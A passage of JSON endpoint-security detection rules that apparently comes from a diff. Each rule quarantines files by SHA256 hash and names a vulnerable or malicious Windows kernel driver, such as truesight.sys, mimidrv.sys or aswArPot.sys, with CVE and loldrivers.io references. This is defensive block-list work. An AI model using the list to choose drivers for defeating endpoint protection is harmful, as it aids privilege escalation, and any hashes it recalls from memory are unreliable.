"2026-03-23T11:45:30.479459Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479464Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e1d2d76829640542eabc0c96356675c0a930e4607869de8037daf62f898903b5", + "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8e45fc2-199e-5572-8624-ec1271d6285f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968421Z", + "creation_date": "2026-03-23T11:45:29.968423Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968429Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1cda1a6e33d14d5dd06344425102bf840f8149e817ecfb01c59a2190d3367024", + "comment": "Ours Technology Inc. Dangerous I/O Driver (aka otipcibus64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8e6ff44-980c-565d-8ae3-23e7e3eec757", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497615Z", + "creation_date": "2026-03-23T11:45:31.497617Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497623Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": 
null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6aa0d21b1220237c2fb7d857edca84352fc11a8b177a33344e54c1037e064d20", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8e914cd-392d-5ffc-928c-3423d653b97b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480558Z", + "creation_date": "2026-03-23T11:45:31.480562Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480572Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a8ae1c8e388b120b3ac6bb84d2b3d3b032e683f79281360a2cbfbcb3107e3f96", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8f0ca2c-dab8-5590-b2f7-8e4356626c4f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616256Z", + "creation_date": "2026-03-23T11:45:29.616257Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616263Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a6ae7364fd188c10d6b5a729a7ff58a3eb11e7feb0d107d18f9133655c11fb66", + "comment": "Huawei vulnerable BIOS update tool (aka Phymemx64.sys) [https://www.loldrivers.io/drivers/268e87ba-ad44-4f3c-986f-26712cac68da/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f8fe3526-971b-53c4-90d5-846568f51a6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970211Z", + "creation_date": "2026-03-23T11:45:29.970213Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970218Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72f100edc998bb2fc40a3a7e7d76c6c37f7173b812f5cd7ae62c824b3fc63d57", + "comment": "Avast Vulnerable Driver (aka 
aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f9031162-1e09-5420-84da-72885ee0bd62", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463327Z", + "creation_date": "2026-03-23T11:45:30.463330Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463339Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f6157e033a12520c73dcedf8e49cd42d103e5874c34d6527bb9de25a5d26e5ad", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f9042b32-c4ee-505e-bfef-95b727c438ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.468167Z", + "creation_date": 
"2026-03-23T11:45:30.468171Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.468180Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6e521e54a1e5a03abaae405b58a84758058f3fac5e8cd8a370f232c7dc7bb164", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f907231c-550b-5cd2-9a65-5a074c96c423", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481134Z", + "creation_date": "2026-03-23T11:45:31.481138Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481147Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7d5c338e4ab0b92bc80961d98a25ceb92a105f58fafda64777d70f6aa138faf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f90a2ffd-0464-52b4-8ae3-eac317372341", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976155Z", + "creation_date": "2026-03-23T11:45:29.976157Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976163Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "34e6a56c60746c51034b45a7b2a36617205b598d0bbcc695f92404605a0975d5", + "comment": "Vulnerable Lenovo Diagnostics driver (aka LenovoDiagnosticsDriver.sys) [CVE-2022-3699] [https://github.com/alfarom256/CVE-2022-3699] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f916f197-de6b-5c3c-8571-905df60e549b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476933Z", + "creation_date": "2026-03-23T11:45:31.476937Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476954Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d9733e7799bff5df15ebaa7591d406be7786924a51c819167922e0afa3fda614", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f91c6734-d1ca-59d6-b7ab-a73cb455a6ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490713Z", + "creation_date": "2026-03-23T11:45:31.490715Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490721Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "318ddeb258168ecbaa379f3199089c7cb23f4c9cd498c0a383beaca109878dd9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f91e4cda-4859-5704-9f13-f638b6771aa4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827140Z", + "creation_date": "2026-03-23T11:45:31.827142Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827147Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "47bfe2a7b5686f38002e3a5d5663bb74c4b0a7c280519a9b971ffd003071c07b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f92e3c8a-0275-594f-a06e-a17eeca88374", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153806Z", + "creation_date": "2026-03-23T11:45:31.153808Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153814Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"8481430a617ece277a9a7bf70c0c50b901c46ecb98a92e335c790c937d9bd70b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f92fa147-7d3e-5374-9d17-14819c11a38b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618006Z", + "creation_date": "2026-03-23T11:45:29.618008Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618013Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4115b7a30061d11a034188c0ec7a2223f3b032c8b3420cfffabf6c4df692920d", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f9327c82-ba45-5cbb-afdf-706c0149f6fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475618Z", + "creation_date": "2026-03-23T11:45:30.475621Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475630Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bfbc382decb986b6050268e53092eae5e981cb886ccfb116ca7a0b311cef3862", + "comment": "Vulnerable Kernel Driver (aka vboxguest.sys) [https://www.loldrivers.io/drivers/0baa833c-e4e1-449e-86ee-cafeb11f5fd5/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f9368f53-f4c3-559a-a3bc-7f03d37c9d9a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475330Z", + "creation_date": "2026-03-23T11:45:30.475333Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475342Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f0474e76cfd36e37e32cfe5c0a9e05ddee17dd5014d7aa8817ea3634a3540a3f", + "comment": "Malicious Kernel Driver (aka 
ef0e1725aaf0c6c972593f860531a2ea.sys) [https://www.loldrivers.io/drivers/8c2df58f-1e02-4911-ad40-3fa4ed1f4333/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f943649c-5bbb-58b4-947f-d6d4490cf361", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493852Z", + "creation_date": "2026-03-23T11:45:31.493855Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493865Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f700eabf6cf46b012b3a0bba05fd7939d6081f686d686591c0021a064c8905a9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f947f404-365b-515a-96d2-a5069eb02091", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.825681Z", + "creation_date": "2026-03-23T11:45:31.825683Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825688Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "947c7bff48b740945bcee0c26f90952602c023f0226719aed5eb27011016d642", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f9538f55-df4e-501f-9f38-a1a09a117da9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142988Z", + "creation_date": "2026-03-23T11:45:31.142990Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142996Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1bebafbe0c2d80ae7087bddb31e91460a94bad99b4bd4176867aee6e16cdd6bb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f9578a90-f1d3-5aa5-a194-4aac65a5ae0e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456811Z", + "creation_date": "2026-03-23T11:45:30.456814Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456823Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2b33df9aff7cb99a782b252e8eb65ca49874a112986a1c49cd9971210597a8ae", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f960fffb-8411-5135-afda-a28fcb4a353f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979463Z", + "creation_date": "2026-03-23T11:45:29.979465Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979471Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f9f2091fccb289bcf6a945f6b38676ec71dedb32f3674262928ccaf840ca131a", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f9666d23-e67b-5e2b-a5cf-b45775f81d87", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609611Z", + "creation_date": "2026-03-23T11:45:29.609613Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609618Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6056443537d4d2314dabca1b9168f1eaaf17a14eb41f6f5741b6b82b3119790", + "comment": "Novell vulnerable driver (aka nicm.sys, nscm.sys and ncpl.sys) [CVE-2013-3956] [https://www.loldrivers.io/drivers/f4126206-564f-49f5-a942-2138a3131e0e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f96b4b19-958d-5727-b819-3e8f72508355", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459272Z", + "creation_date": "2026-03-23T11:45:30.459275Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459284Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "639ff79f13e40d47b90ecd709699edd10e740cb41451acb95590a68b6352de2b", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f96cdba9-6561-54a9-9025-14a729c93a1d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822019Z", + "creation_date": "2026-03-23T11:45:30.822021Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a4c9fdd68c1f70df223d50d849fb83d11b1abc2256b8916e195f32360bb647ad", + 
